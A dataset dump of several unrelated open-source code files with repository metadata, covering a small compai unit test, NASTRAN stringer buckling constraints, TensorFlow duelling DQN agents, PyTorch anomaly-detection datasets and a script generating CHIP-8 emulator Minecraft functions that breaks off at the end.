| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f42f170bcc3200cc56a28bdd2b7a26c34729ba3a
| 108
|
py
|
Python
|
tests/test_compai.py
|
frndmg/compai
|
6a77e79c71bd490f44496ae60689b4bad37ddaf9
|
[
"MIT"
] | 7
|
2020-12-29T13:55:15.000Z
|
2021-12-02T22:20:33.000Z
|
tests/test_compai.py
|
frndmg/compai
|
6a77e79c71bd490f44496ae60689b4bad37ddaf9
|
[
"MIT"
] | 3
|
2021-01-20T15:18:36.000Z
|
2021-03-10T17:21:24.000Z
|
tests/test_compai.py
|
frndmg/compai
|
6a77e79c71bd490f44496ae60689b4bad37ddaf9
|
[
"MIT"
] | 1
|
2021-01-20T15:17:28.000Z
|
2021-01-20T15:17:28.000Z
|
from compai import dict_map
def test_dict_map():
assert dict_map(a=int)(dict(a='123')) == dict(a=123)
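# Hedged sketch of what dict_map could look like (an assumption; the real
# implementation lives in the compai package): apply each keyword-supplied
# function to the matching key, leaving other keys untouched.
def _dict_map_sketch(**fns):
    def apply(d):
        return {k: fns.get(k, lambda v: v)(v) for k, v in d.items()}
    return apply

assert _dict_map_sketch(a=int)(dict(a='123')) == dict(a=123)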
| 18
| 56
| 0.685185
| 20
| 108
| 3.5
| 0.55
| 0.3
| 0.228571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 0.148148
| 108
| 5
| 57
| 21.6
| 0.695652
| 0
| 0
| 0
| 0
| 0
| 0.027778
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f437f27af614339153ee93f076a954adf73a5ce2
| 10,673
|
py
|
Python
|
structmanager/optimization/sol200/elements1d/stringer/constraints.py
|
saullocastro/structmanager
|
01e9677f201c9ef577fdf8a15833be7e364441ab
|
[
"BSD-3-Clause"
] | 1
|
2015-09-17T20:48:08.000Z
|
2015-09-17T20:48:08.000Z
|
structmanager/optimization/sol200/elements1d/stringer/constraints.py
|
saullocastro/structmanager
|
01e9677f201c9ef577fdf8a15833be7e364441ab
|
[
"BSD-3-Clause"
] | 1
|
2019-01-09T20:31:17.000Z
|
2019-01-10T11:10:07.000Z
|
structmanager/optimization/sol200/elements1d/stringer/constraints.py
|
saullocastro/structmanager
|
01e9677f201c9ef577fdf8a15833be7e364441ab
|
[
"BSD-3-Clause"
] | 1
|
2020-12-29T00:22:23.000Z
|
2020-12-29T00:22:23.000Z
|
import structmanager.sol200.output_codes as output_codes_SOL200
from structmanager.sol200 import (DRESP1, DCONSTR, DEQATN, DRESP2, DESVAR,
DVPREL1, DVPREL2)
def constrain_buckling(self, method=1, ms=0.1):
"""Add a buckling constraint
Parameters
----------
method : int, optional
Select one of the following methods for buckling calculation:
        For `profile` in ['Z_t', 'Z_t_b', 'Z_t_b_h']:
- `1` : Bruhn's method for Channel- and Z-section stiffeners. From
Fig. C6.4 for `tw=tf` (thickness web = thickness flange)
- considers only compressive loads
- no plasticity correction has been implemented
For `profile` in ['B_t', 'B_t_h']:
- `1` : Bruhn's method for combined shear and compression, from
Chapter C5.11.
            - disregards bending effects
- assumes 3 edges simply supported with one free unloaded
edge.
- no plasticity correction has been implemented
ms : float, optional
Minimum margin of safety to be used as constraint.
"""
self.create_dvars()
eltype = self.elements[0].type
# reading constants
dtable_E = self.dtables['STRE'][0]
dtable_nu = self.dtables['STRnu'][0]
if method == 1 and self.profile.lower() == 'z_t':
# buckling equation
deqatn = DEQATN(
'bf(t, b, h, E, nu, FA) = b-t/2.;'
'bw = h-t;'
'x = bf/bw;'
'Kw = -206.08*x**5 + 588.3*x**4 - 596.43*x**3 '
'+ 249.62*x**2 -41.924*x + 6.4545;'
'SIGMAcr = Kw*PI(1)**2*E*t**2/(12.*(1.-nu**2)*bw**2);'
'MS = SIGMAcr/ABS(MIN(FA, 0.0001))-1.;')
self.add_deqatn(deqatn)
# reading variables
dvar_t = self.dvars['STRZt']
# reading constants
dtable_b = self.dtables['STRZb'][0]
dtable_h = self.dtables['STRZh'][0]
# building DRESP1 that reads:
# - axial stress
OUTC = output_codes_SOL200.OUTC
if eltype == 'CBAR':
atta = OUTC['STRESS']['CBAR']['Axial']
else:
raise NotImplementedError('element %s not implemented' %
eltype)
eid = self.get_central_element().eid
dresp_FA = DRESP1('STRZFA', 'STRESS', 'ELEM', region=None,
atta=atta, attb='', atti=eid)
self.add_dresp(dresp_FA)
# building DRESP2
dresp2 = DRESP2('STRBUCK', deqatn.id)
dresp2.dvars = [dvar_t.id]
dresp2.dtable = [dtable_b, dtable_h, dtable_E, dtable_nu]
dresp2.dresp1 = [dresp_FA.id]
self.add_dresp(dresp2)
# applying constraint
dcid = self.constraints['buckling']
dconstr = self.add_constraint(dcid, dresp2, ms, None)
elif method == 1 and self.profile.lower() == 'z_t_b':
# buckling equation
deqatn = DEQATN(
'bf(t, b, h, E, nu, FA) = b-t/2.;'
'bw = h-t;'
'x = bf/bw;'
'Kw = -206.08*x**5 + 588.3*x**4 - 596.43*x**3 '
'+ 249.62*x**2 -41.924*x + 6.4545;'
'SIGMAcr = Kw*PI(1)**2*E*t**2/(12.*(1.-nu**2)*bw**2);'
'MS = SIGMAcr/ABS(MIN(FA, 0.0001))-1.;')
self.add_deqatn(deqatn)
# reading variables
dvar_t = self.dvars['STRZt']
dvar_b = self.dvars['STRZb']
# reading constants
dtable_h = self.dtables['STRZh'][0]
# building DRESP1 that reads:
# - axial stress
OUTC = output_codes_SOL200.OUTC
if eltype == 'CBAR':
atta = OUTC['STRESS']['CBAR']['Axial']
else:
raise NotImplementedError('element %s not implemented' %
eltype)
eid = self.get_central_element().eid
dresp_FA = DRESP1('STRZFA', 'STRESS', 'ELEM', region=None,
atta=atta, attb='', atti=eid)
self.add_dresp(dresp_FA)
# building DRESP2
dresp2 = DRESP2('STRBUCK', deqatn.id)
dresp2.dvars = [dvar_t.id, dvar_b.id]
dresp2.dtable = [dtable_h, dtable_E, dtable_nu]
dresp2.dresp1 = [dresp_FA.id]
self.add_dresp(dresp2)
# applying constraint
dcid = self.constraints['buckling']
dconstr = self.add_constraint(dcid, dresp2, ms, None)
elif method == 1 and self.profile.lower() == 'z_t_b_h':
# buckling equation
deqatn = DEQATN(
'bf(t, b, h, E, nu, FA) = b-t/2.;'
'bw = h-t;'
'x = bf/bw;'
'Kw = -206.08*x**5 + 588.3*x**4 - 596.43*x**3 '
'+ 249.62*x**2 -41.924*x + 6.4545;'
'SIGMAcr = Kw*PI(1)**2*E*t**2/(12.*(1.-nu**2)*bw**2);'
'MS = SIGMAcr/ABS(MIN(FA, 0.0001))-1.;')
self.add_deqatn(deqatn)
# reading variables
dvar_t = self.dvars['STRZt']
dvar_b = self.dvars['STRZb']
dvar_h = self.dvars['STRZh']
# building DRESP1 that reads:
# - axial stress
OUTC = output_codes_SOL200.OUTC
if eltype == 'CBAR':
atta = OUTC['STRESS']['CBAR']['Axial']
else:
raise NotImplementedError('element %s not implemented' %
eltype)
eid = self.get_central_element().eid
dresp_FA = DRESP1('STRZFA', 'STRESS', 'ELEM', region=None,
atta=atta, attb='', atti=eid)
self.add_dresp(dresp_FA)
# building DRESP2
dresp2 = DRESP2('STRBUCK', deqatn.id)
dresp2.dvars = [dvar_t.id, dvar_b.id, dvar_h.id]
dresp2.dtable = [dtable_E, dtable_nu]
dresp2.dresp1 = [dresp_FA.id]
self.add_dresp(dresp2)
# applying constraint
dcid = self.constraints['buckling']
dconstr = self.add_constraint(dcid, dresp2, ms, None)
elif method == 1 and self.profile.lower() == 'b_t':
# buckling equation
# - considers combined compression + shear
        # - disregards bending effects
# - assumes 3 edges simply supported and one free unloaded edge
deqatn = DEQATN('kc(t, h, L, E, nu, PC, PS) = 0.456 + (h/L)**2;'
'FCcr = kc*PI(1)**2*E*t**2/(12.*(1.-nu**2)*h**2);'
'FC = PC/(t*h);'
'Rc = FC/FCcr;'
'x = L/h;'
'ks = 0.0648*x**6 - 1.2338*x**5 + 9.4869*x**4 -'
'37.697*x**3 + 81.88*x**2 - 93.218*x + 50.411;'
'ks = MAX(ks, 5.42);'
'FScr = ks*PI(1)**2*E*t**2/(12.*(1.-nu**2)*h**2);'
'FS = PS/(t*h);'
'Rs = FS/FScr;'
'MS = 2./(Rc + SQRT(Rc**2 + 4*Rs**2)) - 1.')
self.add_deqatn(deqatn)
# reading variables
dvar_t = self.dvars['STRBt']
# reading constants
dtable_h = self.dtables['STRBh'][0]
dtable_L = self.dtables['STRBL'][0]
# building DRESP1s that read:
# - axial force
# - shear along Plane 1 (y axis)
OUTC = output_codes_SOL200.OUTC
if eltype == 'CBAR':
code_PC = OUTC['FORCE']['CBAR']['Axial force']
code_PS = OUTC['FORCE']['CBAR']['Shear plane 1']
else:
raise NotImplementedError('element %s not implemented' %
eltype)
eid = self.get_central_element().eid
dresp_PC = DRESP1('STRPC', 'FORCE', 'ELEM', region=None,
atta=code_PC, attb='', atti=eid)
dresp_PS = DRESP1('STRPS', 'FORCE', 'ELEM', region=None,
atta=code_PS, attb='', atti=eid)
self.add_dresp(dresp_PC)
self.add_dresp(dresp_PS)
# building DRESP2
dresp2 = DRESP2('STRBUCK', deqatn.id)
dresp2.dvars = [dvar_t.id]
dresp2.dtable = [dtable_h, dtable_L, dtable_E, dtable_nu]
dresp2.dresp1 = [dresp_PC.id, dresp_PS.id]
self.add_dresp(dresp2)
# applying constraint
dcid = self.constraints['buckling']
dconstr = self.add_constraint(dcid, dresp2, ms, None)
elif method == 1 and self.profile.lower() == 'b_t_h':
# buckling equation
# - considers combined compression + shear
        # - disregards bending effects
# - assumes 3 edges simply supported and one free unloaded edge
deqatn = DEQATN('kc(t, h, L, E, nu, PC, PS) = 0.456 + (h/L)**2;'
'FCcr = kc*PI(1)**2*E*t**2/(12.*(1.-nu**2)*h**2);'
'FC = PC/(t*h);'
'Rc = FC/FCcr;'
'x = L/h;'
'ks = 0.0648*x**6 - 1.2338*x**5 + 9.4869*x**4 -'
'37.697*x**3 + 81.88*x**2 - 93.218*x + 50.411;'
'ks = MAX(ks, 5.42);'
'FScr = ks*PI(1)**2*E*t**2/(12.*(1.-nu**2)*h**2);'
'FS = PS/(t*h);'
'Rs = FS/FScr;'
'MS = 2./(Rc + SQRT(Rc**2 + 4*Rs**2)) - 1.')
self.add_deqatn(deqatn)
# reading variables
dvar_t = self.dvars['STRBt']
dvar_h = self.dvars['STRBh']
# reading constants
dtable_L = self.dtables['STRBL'][0]
# building DRESP1s that read:
# - axial force
# - shear along Plane 1 (y axis)
OUTC = output_codes_SOL200.OUTC
if eltype == 'CBAR':
code_PC = OUTC['FORCE']['CBAR']['Axial force']
code_PS = OUTC['FORCE']['CBAR']['Shear plane 1']
else:
raise NotImplementedError('element %s not implemented' %
eltype)
eid = self.get_central_element().eid
dresp_PC = DRESP1('STRPC', 'FORCE', 'ELEM', region=None,
atta=code_PC, attb='', atti=eid)
dresp_PS = DRESP1('STRPS', 'FORCE', 'ELEM', region=None,
atta=code_PS, attb='', atti=eid)
self.add_dresp(dresp_PC)
self.add_dresp(dresp_PS)
# building DRESP2
dresp2 = DRESP2('STRBUCK', deqatn.id)
dresp2.dvars = [dvar_t.id, dvar_h.id]
dresp2.dtable = [dtable_L, dtable_E, dtable_nu]
dresp2.dresp1 = [dresp_PC.id, dresp_PS.id]
self.add_dresp(dresp2)
# applying constraint
dcid = self.constraints['buckling']
dconstr = self.add_constraint(dcid, dresp2, ms, None)
else:
raise NotImplementedError('Stringer %s profile not supported!' %
self.profile)
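# Hedged standalone transcription (illustrative only, not part of the original
# file) of the Z-section buckling DEQATN used above, so the margin of safety
# can be sanity-checked in plain Python; names mirror the equation string.
import math

def ms_z_section_sketch(t, b, h, E, nu, FA):
    bf = b - t / 2.0
    bw = h - t
    x = bf / bw
    Kw = (-206.08 * x**5 + 588.3 * x**4 - 596.43 * x**3
          + 249.62 * x**2 - 41.924 * x + 6.4545)
    sigma_cr = Kw * math.pi**2 * E * t**2 / (12.0 * (1.0 - nu**2) * bw**2)
    # MIN(FA, 0.0001) keeps the denominator away from zero for tensile loads.
    return sigma_cr / abs(min(FA, 0.0001)) - 1.0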
| 41.208494
| 74
| 0.506699
| 1,336
| 10,673
| 3.946108
| 0.15494
| 0.029211
| 0.027314
| 0.006639
| 0.848445
| 0.848445
| 0.814871
| 0.808422
| 0.792868
| 0.792868
| 0
| 0.056856
| 0.347419
| 10,673
| 258
| 75
| 41.368217
| 0.700072
| 0.172398
| 0
| 0.847458
| 0
| 0.118644
| 0.225477
| 0.03331
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00565
| false
| 0
| 0.011299
| 0
| 0.016949
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f46f3db573e71c793d978b7aa9e833f0c84104fd
| 10,713
|
py
|
Python
|
tf_rl/agents/unstable/Duelling_DQN_model.py
|
Rowing0914/TF_RL
|
68e5e9a23e38ed2d8ac5f97d380567b919a3d2e7
|
[
"MIT"
] | 23
|
2019-04-04T17:34:56.000Z
|
2021-12-14T19:34:10.000Z
|
tf_rl/agents/unstable/Duelling_DQN_model.py
|
Rowing0914/TF_RL
|
68e5e9a23e38ed2d8ac5f97d380567b919a3d2e7
|
[
"MIT"
] | 5
|
2020-11-13T17:40:40.000Z
|
2022-03-12T00:11:33.000Z
|
tf_rl/agents/unstable/Duelling_DQN_model.py
|
Rowing0914/TF_RL
|
68e5e9a23e38ed2d8ac5f97d380567b919a3d2e7
|
[
"MIT"
] | 3
|
2019-07-17T23:56:36.000Z
|
2022-03-13T03:55:21.000Z
|
import tensorflow as tf
import os
from tf_rl.common.utils import huber_loss
class Duelling_DQN:
"""
Duelling DQN Agent
"""
def __init__(self):
"""
define your model here!
"""
pass
def predict(self, sess, state):
"""
predict q-values given a state
:param sess:
:param state:
:return:
"""
return sess.run(self.pred, feed_dict={self.state: state})
def update(self, sess, state, action, Y):
feed_dict = {self.state: state, self.action: action, self.Y: Y}
summaries, total_t, _, loss = sess.run([self.summaries, tf.train.get_global_step(), self.train_op, self.loss],
feed_dict=feed_dict)
# print(action, Y, sess.run(self.idx_flattened, feed_dict=feed_dict))
self.summary_writer.add_summary(summaries, total_t)
return loss
class Duelling_DQN_CartPole(Duelling_DQN):
"""
Duelling DQN Agent
"""
def __init__(self, scope, dueling_type, env, loss_fn="MSE", grad_clip_flg=True):
self.scope = scope
self.num_action = env.action_space.n
self.summaries_dir = "../logs/summary_{}".format(scope)
self.grad_clip_flg = grad_clip_flg
if self.summaries_dir:
summary_dir = os.path.join(self.summaries_dir, "summaries_{}".format(scope))
if not os.path.exists(summary_dir):
os.makedirs(summary_dir)
self.summary_writer = tf.summary.FileWriter(summary_dir)
with tf.variable_scope(scope):
self.state = tf.placeholder(shape=[None, env.observation_space.shape[0]], dtype=tf.float32, name="X")
self.Y = tf.placeholder(shape=[None], dtype=tf.float32, name="Y")
self.action = tf.placeholder(shape=[None], dtype=tf.int32, name="action")
fc1 = tf.keras.layers.Dense(16, activation=tf.nn.relu)(self.state)
fc2 = tf.keras.layers.Dense(16, activation=tf.nn.relu)(fc1)
self.pred = tf.keras.layers.Dense(self.num_action, activation=tf.nn.relu)(fc2)
self.state_value = tf.keras.layers.Dense(1, activation=tf.nn.relu)(fc2)
if dueling_type == "avg":
# Q(s,a;theta) = V(s;theta) + (A(s,a;theta)-Avg_a(A(s,a;theta)))
self.output = tf.math.add(self.state_value, tf.math.subtract(self.pred, tf.reduce_mean(self.pred)))
elif dueling_type == "max":
# Q(s,a;theta) = V(s;theta) + (A(s,a;theta)-max_a(A(s,a;theta)))
self.output = tf.math.add(self.state_value, tf.math.subtract(self.pred, tf.math.reduce_max(self.pred)))
elif dueling_type == "naive":
# Q(s,a;theta) = V(s;theta) + A(s,a;theta)
self.output = tf.math.add(self.state_value, self.pred)
else:
assert False, "dueling_type must be one of {'avg','max','naive'}"
# indices of the executed actions
idx_flattened = tf.range(0, tf.shape(self.output)[0]) * tf.shape(self.output)[1] + self.action
# passing [-1] to tf.reshape means flatten the array
# using tf.gather, associate Q-values with the executed actions
self.action_probs = tf.gather(tf.reshape(self.output, [-1]), idx_flattened)
if loss_fn == "huber_loss":
# use huber loss
self.losses = tf.subtract(self.Y, self.action_probs)
self.loss = huber_loss(self.losses)
# self.loss = tf.reduce_mean(huber_loss(self.losses))
elif loss_fn == "MSE":
# use MSE
self.losses = tf.squared_difference(self.Y, self.action_probs)
self.loss = tf.reduce_mean(self.losses)
else:
assert False
# you can choose whatever you want for the optimiser
# self.optimizer = tf.train.RMSPropOptimizer(0.00025, 0.99, 0.0, 1e-6)
self.optimizer = tf.train.AdamOptimizer()
if self.grad_clip_flg:
# to apply Gradient Clipping, we have to directly operate on the optimiser
# check this: https://www.tensorflow.org/api_docs/python/tf/train/Optimizer#processing_gradients_before_applying_them
# https://stackoverflow.com/questions/49987839/how-to-handle-none-in-tf-clip-by-global-norm
self.gradients, self.variables = zip(*self.optimizer.compute_gradients(self.loss))
# self.clipped_grads_and_vars = [(ClipIfNotNone(grad, -1., 1.), var) for grad, var in self.grads_and_vars]
self.gradients, _ = tf.clip_by_global_norm(self.gradients, 2.5)
self.train_op = self.optimizer.apply_gradients(zip(self.gradients, self.variables))
for i, grad in enumerate(self.gradients):
if grad is not None:
mean = tf.reduce_mean(tf.abs(grad))
tf.summary.scalar('mean_{}'.format(i + 1), mean)
tf.summary.histogram('histogram_{}'.format(i + 1), grad)
else:
self.train_op = self.optimizer.minimize(self.loss)
tf.summary.scalar("loss", tf.reduce_mean(self.loss))
tf.summary.histogram("loss_hist", self.losses)
tf.summary.histogram("q_values_hist", self.pred)
tf.summary.scalar("mean_q_value", tf.math.reduce_mean(self.pred))
tf.summary.scalar("var_q_value", tf.math.reduce_variance(self.pred))
tf.summary.scalar("max_q_value", tf.reduce_max(self.pred))
self.summaries = tf.summary.merge_all()
class Duelling_DQN_Atari(Duelling_DQN):
"""
Duelling DQN Agent
"""
def __init__(self, scope, dueling_type, env, loss_fn="MSE", grad_clip_flg=True):
self.scope = scope
self.num_action = env.action_space.n
self.summaries_dir = "../logs/summary_{}".format(scope)
self.grad_clip_flg = grad_clip_flg
if self.summaries_dir:
summary_dir = os.path.join(self.summaries_dir, "summaries_{}".format(scope))
if not os.path.exists(summary_dir):
os.makedirs(summary_dir)
self.summary_writer = tf.summary.FileWriter(summary_dir)
with tf.variable_scope(scope):
self.state = tf.placeholder(shape=[None, 84, 84, 1], dtype=tf.float32, name="X")
self.Y = tf.placeholder(shape=[None], dtype=tf.float32, name="Y")
self.action = tf.placeholder(shape=[None], dtype=tf.int32, name="action")
conv1 = tf.keras.layers.Conv2D(32, kernel_size=8, strides=8, activation=tf.nn.relu)(self.state)
conv2 = tf.keras.layers.Conv2D(64, kernel_size=4, strides=2, activation=tf.nn.relu)(conv1)
conv3 = tf.keras.layers.Conv2D(64, kernel_size=3, strides=1, activation=tf.nn.relu)(conv2)
flat = tf.keras.layers.Flatten()(conv3)
fc1 = tf.keras.layers.Dense(512, activation=tf.nn.relu)(flat)
self.pred = tf.keras.layers.Dense(self.num_action, activation=tf.nn.relu)(fc1)
self.state_value = tf.keras.layers.Dense(1, activation=tf.nn.relu)(fc1)
if dueling_type == "avg":
# Q(s,a;theta) = V(s;theta) + (A(s,a;theta)-Avg_a(A(s,a;theta)))
self.output = tf.math.add(self.state_value, tf.math.subtract(self.pred, tf.reduce_mean(self.pred)))
elif dueling_type == "max":
# Q(s,a;theta) = V(s;theta) + (A(s,a;theta)-max_a(A(s,a;theta)))
self.output = tf.math.add(self.state_value, tf.math.subtract(self.pred, tf.math.reduce_max(self.pred)))
elif dueling_type == "naive":
# Q(s,a;theta) = V(s;theta) + A(s,a;theta)
self.output = tf.math.add(self.state_value, self.pred)
else:
assert False, "dueling_type must be one of {'avg','max','naive'}"
# indices of the executed actions
idx_flattened = tf.range(0, tf.shape(self.output)[0]) * tf.shape(self.output)[1] + self.action
# passing [-1] to tf.reshape means flatten the array
# using tf.gather, associate Q-values with the executed actions
self.action_probs = tf.gather(tf.reshape(self.output, [-1]), idx_flattened)
if loss_fn == "huber_loss":
# use huber loss
self.losses = tf.subtract(self.Y, self.action_probs)
self.loss = huber_loss(self.losses)
# self.loss = tf.reduce_mean(huber_loss(self.losses))
elif loss_fn == "MSE":
# use MSE
self.losses = tf.squared_difference(self.Y, self.action_probs)
self.loss = tf.reduce_mean(self.losses)
else:
assert False
# you can choose whatever you want for the optimiser
# self.optimizer = tf.train.RMSPropOptimizer(0.00025, 0.99, 0.0, 1e-6)
self.optimizer = tf.train.AdamOptimizer()
if self.grad_clip_flg:
# to apply Gradient Clipping, we have to directly operate on the optimiser
# check this: https://www.tensorflow.org/api_docs/python/tf/train/Optimizer#processing_gradients_before_applying_them
# https://stackoverflow.com/questions/49987839/how-to-handle-none-in-tf-clip-by-global-norm
self.gradients, self.variables = zip(*self.optimizer.compute_gradients(self.loss))
# self.clipped_grads_and_vars = [(ClipIfNotNone(grad, -1., 1.), var) for grad, var in self.grads_and_vars]
self.gradients, _ = tf.clip_by_global_norm(self.gradients, 2.5)
self.train_op = self.optimizer.apply_gradients(zip(self.gradients, self.variables))
for i, grad in enumerate(self.gradients):
if grad is not None:
mean = tf.reduce_mean(tf.abs(grad))
tf.summary.scalar('mean_{}'.format(i + 1), mean)
tf.summary.histogram('histogram_{}'.format(i + 1), grad)
else:
self.train_op = self.optimizer.minimize(self.loss)
tf.summary.scalar("loss", tf.reduce_mean(self.loss))
tf.summary.histogram("loss_hist", self.losses)
tf.summary.histogram("q_values_hist", self.pred)
tf.summary.scalar("mean_q_value", tf.math.reduce_mean(self.pred))
tf.summary.scalar("var_q_value", tf.math.reduce_variance(self.pred))
tf.summary.scalar("max_q_value", tf.reduce_max(self.pred))
self.summaries = tf.summary.merge_all()
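# Hedged numpy sketch (not part of the original file) of the "avg" dueling
# aggregation both classes above use: Q(s,a) = V(s) + (A(s,a) - mean_a A(s,a)).
import numpy as np

def dueling_q_sketch(state_value, advantages):
    # state_value: shape (batch, 1); advantages: shape (batch, num_actions)
    return state_value + (advantages - advantages.mean(axis=-1, keepdims=True))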
| 50.295775
| 133
| 0.597218
| 1,433
| 10,713
| 4.319609
| 0.153524
| 0.027141
| 0.018094
| 0.029079
| 0.89273
| 0.877221
| 0.870436
| 0.86042
| 0.854281
| 0.842003
| 0
| 0.0154
| 0.272659
| 10,713
| 212
| 134
| 50.533019
| 0.779004
| 0.188649
| 0
| 0.775194
| 0
| 0
| 0.045178
| 0.004916
| 0
| 0
| 0
| 0
| 0.031008
| 1
| 0.03876
| false
| 0.007752
| 0.023256
| 0
| 0.100775
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f47ee1dcaf669a6f2bf521e702afba239b9b308e
| 4,193
|
py
|
Python
|
src/datasets/oe.py
|
wych1005/Deep-SAD-PyTorch
|
af93186a38ed30985dc155d1b00b90aa181cfe0b
|
[
"MIT"
] | null | null | null |
src/datasets/oe.py
|
wych1005/Deep-SAD-PyTorch
|
af93186a38ed30985dc155d1b00b90aa181cfe0b
|
[
"MIT"
] | null | null | null |
src/datasets/oe.py
|
wych1005/Deep-SAD-PyTorch
|
af93186a38ed30985dc155d1b00b90aa181cfe0b
|
[
"MIT"
] | null | null | null |
from torch.utils.data import DataLoader, Subset
from base.base_dataset import BaseADDataset
from base.oe_dataset import OEDataset, Tiled32
from .preprocessing import create_semisupervised_setting
import torch
class OEADD_dataset(BaseADDataset):
def __init__(self, modality: str, root: str, dataset_name: str, n_known_outlier_classes: int = 0, ratio_known_normal: float = 0.0,
ratio_known_outlier: float = 0.0, ratio_pollution: float = 0.0):
super().__init__(root)
# Define normal and outlier classes
self.n_classes = 2 # 0: normal, 1: outlier
self.normal_classes = (0,)
self.outlier_classes = (1,)
if n_known_outlier_classes == 0:
self.known_outlier_classes = ()
else:
self.known_outlier_classes = (1,)
# Get train set
train_set = OEDataset(root=self.root, dataset_name=dataset_name, train=True, modality=modality)
# Create semi-supervised setting
idx, _, semi_targets = create_semisupervised_setting(train_set.targets.cpu().data.numpy(), self.normal_classes,
self.outlier_classes, self.known_outlier_classes,
ratio_known_normal, ratio_known_outlier, ratio_pollution)
train_set.semi_targets[idx] = torch.tensor(semi_targets) # set respective semi-supervised labels
# Subset train_set to semi-supervised setup
self.train_set = Subset(train_set, idx)
# Get test set
self.test_set = OEDataset(root=self.root, dataset_name=dataset_name, train=False, modality=modality)
def loaders(self, batch_size: int, shuffle_train=True, shuffle_test=False, num_workers: int = 0) -> (DataLoader, DataLoader):
train_loader = DataLoader(dataset=self.train_set, batch_size=batch_size, shuffle=shuffle_train,
num_workers=num_workers, drop_last=True)
test_loader = DataLoader(dataset=self.test_set, batch_size=batch_size, shuffle=shuffle_test,
num_workers=num_workers, drop_last=False)
return train_loader, test_loader
class Tiled32_dataset(BaseADDataset):
def __init__(self, modality: str, root: str, dataset_name: str, n_known_outlier_classes: int = 0, ratio_known_normal: float = 0.0,
ratio_known_outlier: float = 0.0, ratio_pollution: float = 0.0):
super().__init__(root)
# Define normal and outlier classes
self.n_classes = 2 # 0: normal, 1: outlier
self.normal_classes = (0,)
self.outlier_classes = (1,)
if n_known_outlier_classes == 0:
self.known_outlier_classes = ()
else:
self.known_outlier_classes = (1,)
# Get train set
train_set = Tiled32(root=self.root, dataset_name=dataset_name, train=True, modality=modality)
# Create semi-supervised setting
idx, _, semi_targets = create_semisupervised_setting(train_set.targets.cpu().data.numpy(), self.normal_classes,
self.outlier_classes, self.known_outlier_classes,
ratio_known_normal, ratio_known_outlier, ratio_pollution)
train_set.semi_targets[idx] = torch.tensor(semi_targets) # set respective semi-supervised labels
# Subset train_set to semi-supervised setup
self.train_set = Subset(train_set, idx)
# Get test set
self.test_set = Tiled32(root=self.root, dataset_name=dataset_name, train=False, modality=modality)
def loaders(self, batch_size: int, shuffle_train=True, shuffle_test=False, num_workers: int = 0) -> (DataLoader, DataLoader):
train_loader = DataLoader(dataset=self.train_set, batch_size=batch_size, shuffle=shuffle_train,
num_workers=num_workers, drop_last=True)
test_loader = DataLoader(dataset=self.test_set, batch_size=batch_size, shuffle=shuffle_test,
num_workers=num_workers, drop_last=False)
return train_loader, test_loader
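# Hedged usage sketch; the argument values below are illustrative assumptions,
# only the constructor and loaders() signatures come from the classes above.
# dataset = OEADD_dataset(modality='rgb', root='./data', dataset_name='oe',
#                         n_known_outlier_classes=1,
#                         ratio_known_normal=0.01,
#                         ratio_known_outlier=0.01,
#                         ratio_pollution=0.1)
# train_loader, test_loader = dataset.loaders(batch_size=128)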
| 49.916667
| 134
| 0.651085
| 506
| 4,193
| 5.086957
| 0.13834
| 0.087024
| 0.073815
| 0.053613
| 0.9223
| 0.9223
| 0.9223
| 0.9223
| 0.9223
| 0.9223
| 0
| 0.012342
| 0.265681
| 4,193
| 83
| 135
| 50.518072
| 0.823644
| 0.092297
| 0
| 0.792453
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075472
| false
| 0
| 0.09434
| 0
| 0.245283
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be47eeb4ad4bef8cab0137a73a526f2b8270c1ad
| 1,909
|
py
|
Python
|
python_helpers/opcode_8xy1.py
|
RandomBananazz/chip8mc
|
0e184c392a523c82dbc945325aa2cb9e5487e5e7
|
[
"MIT"
] | 3
|
2020-09-28T17:50:49.000Z
|
2020-12-30T18:23:46.000Z
|
python_helpers/opcode_8xy1.py
|
RandomBananazz/chip8mc
|
0e184c392a523c82dbc945325aa2cb9e5487e5e7
|
[
"MIT"
] | null | null | null |
python_helpers/opcode_8xy1.py
|
RandomBananazz/chip8mc
|
0e184c392a523c82dbc945325aa2cb9e5487e5e7
|
[
"MIT"
] | null | null | null |
for x in range(16):
with open(f'..\\data\\cpu\\functions\\opcode_switch\\opcode_8xx1\\opcode_8xx1_{x}.mcfunction', 'w') as f:
f.write(f'scoreboard players operation Global bitwise_1 = Global V{hex(x)[2:].upper()}\n'
f'scoreboard players operation Global bitwise_1 /= c16 Constant\n')
for i in range(16):
f.write(f'execute if score Global PC_nibble_3 matches {i} run function cpu:opcode_switch/opcode_8xx1/opcode_8xx1_{x}-{i}\n')
for x in range(16):
for i in range(16):
